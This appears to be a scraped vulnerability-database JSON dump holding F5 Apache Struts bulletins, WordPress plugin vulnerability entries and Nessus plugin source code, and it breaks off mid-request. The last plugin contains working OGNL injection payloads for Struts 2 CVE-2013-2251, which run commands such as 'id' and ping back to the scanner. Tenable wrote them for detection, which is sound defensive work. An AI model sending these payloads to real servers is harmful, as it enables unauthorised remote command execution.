"https://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15241.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "reporter": "f5", "published": "2014-05-15T00:00:00", "title": "SOL15262 - Apache Struts vulnerability CVE-2014-0113", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "id": "SOL15262", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:18", "references": ["https://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15241.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "reporter": "f5", "published": "2014-05-15T00:00:00", "title": "SOL15260 - Apache Struts vulnerability CVE-2014-0094", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "id": "SOL15260", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wpvulndb": [{"lastseen": "2018-09-17T19:26:06", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2340", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2579", "https://www.exploit-db.com/exploits/32701/", "http://packetstormsecurity.com/files/125991/", "https://secunia.com/advisories/57362/", "https://www.htbridge.com/advisory/HTB23206", "https://www.htbridge.com/advisory/HTB23207"], "description": "WordPress Vulnerability - XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF\n", "reporter": "wpvulndb", "published": "2014-08-01T00:00:00", "type": "wpvulndb", "title": "XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF", "enchantments": {"score": {"modified": "2018-09-17T19:26:06", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "xcloner-backup-and-restore", "version": "3.1.1", "operator": "lt"}], "cvelist": ["CVE-2014-2340", "CVE-2014-2579"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2017-01-03T00:00:00", "id": "WPVDB-ID:7154", "href": "https://wpvulndb.com/vulnerabilities/7154", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-17T19:27:04", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1906", "https://www.htbridge.com/advisory/HTB23199"], "description": "WordPress Vulnerability - VideoWhisper Live Streaming Integration 4.27.3 - Multiple Vulnerabilities\n", "reporter": "wpvulndb", "published": "2014-08-01T00:00:00", "type": "wpvulndb", "title": "VideoWhisper Live Streaming Integration 4.27.3 - Multiple Vulnerabilities", "enchantments": {"score": {"modified": "2018-09-17T19:27:04", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "videowhisper-live-streaming-integration", "version": "4.29.5", "operator": "lt"}], "cvelist": ["CVE-2014-1906"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:6175", "href": "https://wpvulndb.com/vulnerabilities/6175", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:26:56", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1854", "https://www.exploit-db.com/exploits/31834/", "http://packetstormsecurity.com/files/125330/", "https://secunia.com/advisories/57079/"], "description": "WordPress Vulnerability - AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection\n", "reporter": "wpvulndb", "published": "2014-08-01T00:00:00", "type": "wpvulndb", "title": "AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection", "enchantments": {"score": {"modified": "2018-09-17T19:26:56", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "adrotate", "version": "3.9.5", "operator": "lt"}], "cvelist": ["CVE-2014-1854"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:6597", "href": "https://wpvulndb.com/vulnerabilities/6597", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-29T20:11:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPVulnDBBulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0166", "https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/", "https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be"], "description": "WordPress Vulnerability - WordPress 3.7.1 & 3.8.1 Potential Authentication Cookie Forgery\n", "reporter": "wpvulndb", "published": "2014-08-01T00:00:00", "type": "wpvulndb", "title": "WordPress 3.7.1 & 3.8.1 Potential Authentication Cookie Forgery", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "WordPress", "version": "3.8.1", "operator": "eq"}, {"name": "WordPress", "version": "3.7.1", "operator": "eq"}, {"name": "WordPress", "version": "3.8.2", "operator": "lt"}, {"name": "WordPress", "version": "3.7.2", "operator": "lt"}], "cvelist": ["CVE-2014-0166"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2018-08-29T00:00:00", "id": "WPVDB-ID:5964", "href": "https://wpvulndb.com/vulnerabilities/5964", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-01T23:54:55", "references": ["http://archiva.apache.org/security.html", "http://commons.apache.org/proper/commons-ognl/"], "pluginID": "73761", "description": "According to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities :\n\n - An input validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests.\n (CVE-2013-2251)", "edition": 7, "reporter": "Tenable", "published": "2014-04-29T00:00:00", "title": "Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2251", "CVE-2013-2187"], "modified": "2018-06-14T00:00:00", "cpe": ["cpe:/a:apache:archiva"], "id": "ARCHIVA_1_3_8.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73761);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2013-2187\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 66991, 66998);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n\n script_name(english:\"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Archiva version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/security.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://commons.apache.org/proper/commons-ognl/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/archiva\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (version !~ \"^1\\.[23]($|\\.)\") audit(AUDIT_WEB_APP_NOT_INST, \"Apache Archiva 1.2.x / 1.3.x\", port);\n\n# Affected (per NVD) :\n# 1.2.x <= 1.2.2\n# 1.3.x <= 1.3.6\n# Fixed (per vendor) :\n# 1.3.8\n# 2.0.1\nif (\n version =~ \"^1\\.2($|[^0-9.])\" ||\n version =~ \"^1\\.2\\.[012]($|[^0-9])\" ||\n version =~ \"^1\\.3($|[^0-9.])\" ||\n version =~ \"^1\\.3\\.[0-6]($|[^0-9])\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.8 / 2.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:06:51", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=713926", "http://www.bugzilla.org/security/4.0.11/"], "pluginID": "74107", "description": "According to its banner, the version of Bugzilla installed on the remote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is, therefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote attacker to cause a user to login using the attacker's credentials, alerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2014-05-20T00:00:00", "title": "Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2018-06-13T00:00:00", "cpe": ["cpe:/a:mozilla:bugzilla"], "id": "BUGZILLA_LOGIN_XSRF.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74107);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n\n script_name(english:\"Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF\");\n script_summary(english:\"Checks Bugzilla version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that suffers from a\ncross-site request forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Bugzilla installed on the\nremote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is,\ntherefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote\nattacker to cause a user to login using the attacker's credentials,\nalerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.bugzilla.org/security/4.0.11/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Bugzilla 4.4.3 / 4.5.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:bugzilla\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"bugzilla_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"installed_sw/Bugzilla\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'Bugzilla';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\n\ninstall_loc = build_url(port:port, qs:dir + \"/query.cgi\");\n\nif (version =~ \"^4($|[^0-9.])\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions less than 4.4.3 / 4.5.3 are vulnerable\nif (\n version =~ \"^[23]\\.\" ||\n version =~ \"^4\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^4\\.(4|4\\.[0-2])([^0-9.]|$)\" ||\n version =~ \"^4\\.(5|5\\.[12])([^0-9.]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_loc+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 4.4.3 / 4.5.3\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-22T18:20:51", "references": ["http://struts.apache.org/docs/s2-016.html", "http://cxsecurity.com/issue/WLB-2014010087", "http://www.securityfocus.com/archive/1/527977/30/0/threaded"], "pluginID": "68981", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression prefixed by the 'action:' parameter, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server. An attacker can exploit the issue by sending a specially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also reportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by an open redirect vulnerability; however, Nessus has not tested for this additional issue.\n\nNote also that this plugin will only report the first vulnerable instance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to 1.3.6 are also affected by this issue as the application utilizes a vulnerable version of Struts 2.", "edition": 11, "reporter": "Tenable", "published": "2013-07-19T00:00:00", "title": "Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2251"], "modified": "2018-09-21T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68981", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68981);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/09/21 14:14:08\");\n\n script_cve_id(\"CVE-2013-2251\");\n script_bugtraq_id(61189);\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution\");\n script_summary(english:\"Attempts to execute arbitrary commands.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a web application that uses a Java\nframework, which is affected by a remote command execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/527977/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 2.3.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nif (max_index(urls) == 0)\n audit(AUDIT_WEB_FILES_NOT, \"Struts 2 .action / .do / .jsp\", port);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"?action:%25{(new+java.lang.ProcessBuilder(new\" +\n \"+java.lang.String[]{'\" +cmd+ \"'})).start()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/java\\.lang\\.\" +\n \"(UNIX)?Process(Impl)?@(.+)\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\n# Alternate attack that does not rely on 404 Error Page from Tomcat/JBoss\n# This attack uses the redirect: Parameter\nif (!vuln)\n{\n time = unixtime();\n foreach url (urls)\n {\n vuln_url = url +\"?redirect:${%23req%3d%23context.get('com.opensymphony\" +\n \".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get\" +\n \"Session().getServletContext().getRealPath('/'),%23resp%3d%23context.\" +\n \"get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').\" +\n \"getWriter(),%23resp.print('At%20\" +time+ \"%20Nessus%20found%20the\" +\n \"%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),\" +\n \"%23resp.close()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\\\\\|/)(.*)')\n )\n {\n vuln = TRUE;\n break;\n }\n if (vuln) break;\n }\n}\n\n# try pingback.\nif(!vuln)\n{\n\n scanner_ip = this_host();\n target_ip = get_host_ip();\n\n ua = get_kb_item(\"global_settings/http_user_agent\");\n if (empty_or_null(ua))\n ua = 'Nessus';\n\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n pat = hexstr(rand_str(length:10));\n\n if (!empty_or_null(os) && \"windows\" >< tolower(os))\n ping_cmd = \"ping%20-n%203\" + scanner_ip;\n else\n ping_cmd = \"ping%20-c%203%20-p\" + pat + \"%20\" + scanner_ip;\n\n payload_ping = \"?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution\" +\n \"%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28\" +\n \"%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28\" +\n \"%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28\" +\n \"@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \n \"%27%29.getInputStream%28%29%29%7d\";\n\n foreach url (urls)\n {\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = url + payload_ping;\n\n req =\n 'GET ' + 